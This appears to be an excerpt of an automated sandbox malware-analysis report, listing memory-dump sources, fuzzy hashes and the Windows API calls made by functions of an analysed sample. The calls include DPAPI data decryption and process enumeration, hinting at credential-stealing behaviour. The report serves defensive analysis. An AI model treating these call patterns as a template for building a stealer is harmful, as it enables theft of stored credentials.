                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                              • Instruction ID: df48f3a05c37a2efa285d48d44845ce7300666475d6b76219e2479966e7c2156
                              • Opcode Fuzzy Hash: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                              • Instruction Fuzzy Hash: 2421E4B2518301AF8354DF65D88889BBBF8FED8314F408A1EF599D3220E730D5088BA6
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                              • LocalFree.KERNEL32(?), ref: 003977B7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                              • Instruction ID: e0b7974ac0550246ea55debe436b346bdfbde6f25607419ba45e490465946d20
                              • Opcode Fuzzy Hash: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                              • Instruction Fuzzy Hash: 86011E75B40308BFEB10DB949C4EFAA7B78EB44B15F104195FB09EA2C0D6B0A904CB94
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B3A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B3AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B3ABF
                                • Part of subcall function 003B7310: lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                • Part of subcall function 003B7310: lstrcpy.KERNEL32(00000000), ref: 003B733F
                                • Part of subcall function 003B7310: lstrcat.KERNEL32(?,------), ref: 003B7349
                                • Part of subcall function 003B7280: lstrcpy.KERNEL32(00000000), ref: 003B72AE
                              • CloseHandle.KERNEL32(00000000), ref: 003B3BF7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                              • Instruction ID: a47d3ce613ebdc91b4c73948582f07197c5017647868b41e6cc21c37f496b896
                              • Opcode Fuzzy Hash: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                              • Instruction Fuzzy Hash: CB811430905624CFC71ACF19C888B95B7F1FF44328F2AC1A9D5099B6A6D7769D86CF80
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0039EA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0039EA7E
                              • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB27
                              • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB49
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 8f60090706a6afae88d73df93f50b2bde8fdd12d520db9b38c1abfdc52a3645d
                              • Instruction ID: 2a18db116bc67656f7728a0cede35b5e1589660a78e4ecfa0a24648ed9942605
                              • Opcode Fuzzy Hash: 8f60090706a6afae88d73df93f50b2bde8fdd12d520db9b38c1abfdc52a3645d
                              • Instruction Fuzzy Hash: 4F31C475A14119ABDB10DB58EC49FFFB77DEF44705F0441A9FA09E2240DBB05A088BA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003B40CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003B40DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B40E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003B4113
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                              • Instruction ID: 2f1cff0e274b70d218132c754791001e3303ac6e123c1186ee58b0dfe3a91c1d
                              • Opcode Fuzzy Hash: 7c4c939662b3265bbdf8817a580fc3ff481d7677ca213feaadc62dafbb35f0d8
                              • Instruction Fuzzy Hash: 84015A74600205AFDB109FA5DC89FAABBADEF94315F108059FE0897240DA719940DBA4
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00399B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00399B61
                              • LocalFree.KERNEL32 ref: 00399B70
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                              • Instruction ID: a128f4963679e1cfeac8e7df350788ade1d0638200c5710aafccbb671a16f136
                              • Opcode Fuzzy Hash: 6dc51ef0922e5a702a0172ce2ad6382a59843e93d2f6eb787f204956957f3689
                              • Instruction Fuzzy Hash: FBF01D70340712AFEB311F69AC4EF567BA8EF14B50F250115FA45EA2D0D7B59844CAA4
                              APIs
                              • CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                              • Instruction ID: f27638604731b7e9c9a570a856b384d58109ef60ee505461e664c5a2dda22a3f
                              • Opcode Fuzzy Hash: c281f0df708efd594d79e67bf5ac016c2242d52c203ed359b2b53c51d63702db
                              • Instruction Fuzzy Hash: 0E317871A40614BFD711DB98CC96FEAB7B9DB88B14F104184FA04EB2D0D7B1AD44CBA0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00399B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00399BB3
                              • LocalFree.KERNEL32(?), ref: 00399BD7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                              • Instruction ID: 6f35c391deb14dfaebb41db2120dcd50807f92af137de6a279d7538b04d3406c
                              • Opcode Fuzzy Hash: 2fcfe0d6373a4ce057314b31edc290dad3687c734d11c2bb4543562d55a38d0e
                              • Instruction Fuzzy Hash: 510112B5E41309AFD7109BA4DC49FAEB778EB44700F104559EA04AB280D7B49904C7E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8=m$<k$ _
                              • API String ID: 0-121367308
                              • Opcode ID: 144d3f84cb021053cf890b4bf9415f1dd2ea51f38a524ec1bed5ef353f567508
                              • Instruction ID: e7bd5cd8cc52a27313269547715093c168a469109902346d8cf0236709465005
                              • Opcode Fuzzy Hash: 144d3f84cb021053cf890b4bf9415f1dd2ea51f38a524ec1bed5ef353f567508
                              • Instruction Fuzzy Hash: 9C0205F350C7049FE3086E28EC95A7ABBE5EB94360F16493DEAC5C7744EA3558008B97
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @DNN$W?~
                              • API String ID: 0-656864507
                              • Opcode ID: 0da3d900e5424aded18f65a602eae61438de7ddb90facc8b4adbe31dd283ba2f
                              • Instruction ID: e8189642583b9be87f55644f698bd5795d243d3161c75eb1894ca45eb6061bee
                              • Opcode Fuzzy Hash: 0da3d900e5424aded18f65a602eae61438de7ddb90facc8b4adbe31dd283ba2f
                              • Instruction Fuzzy Hash: B5B207F360C6049FE3086E2DEC8567AFBE9EF94720F1A493DE6C5C3744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: AtX_$na{T
                              • API String ID: 0-3967294529
                              • Opcode ID: 969708e6dd14f254f2f6a6222a1f73357f4f418759d1ce2bc9f4defbfd1bccae
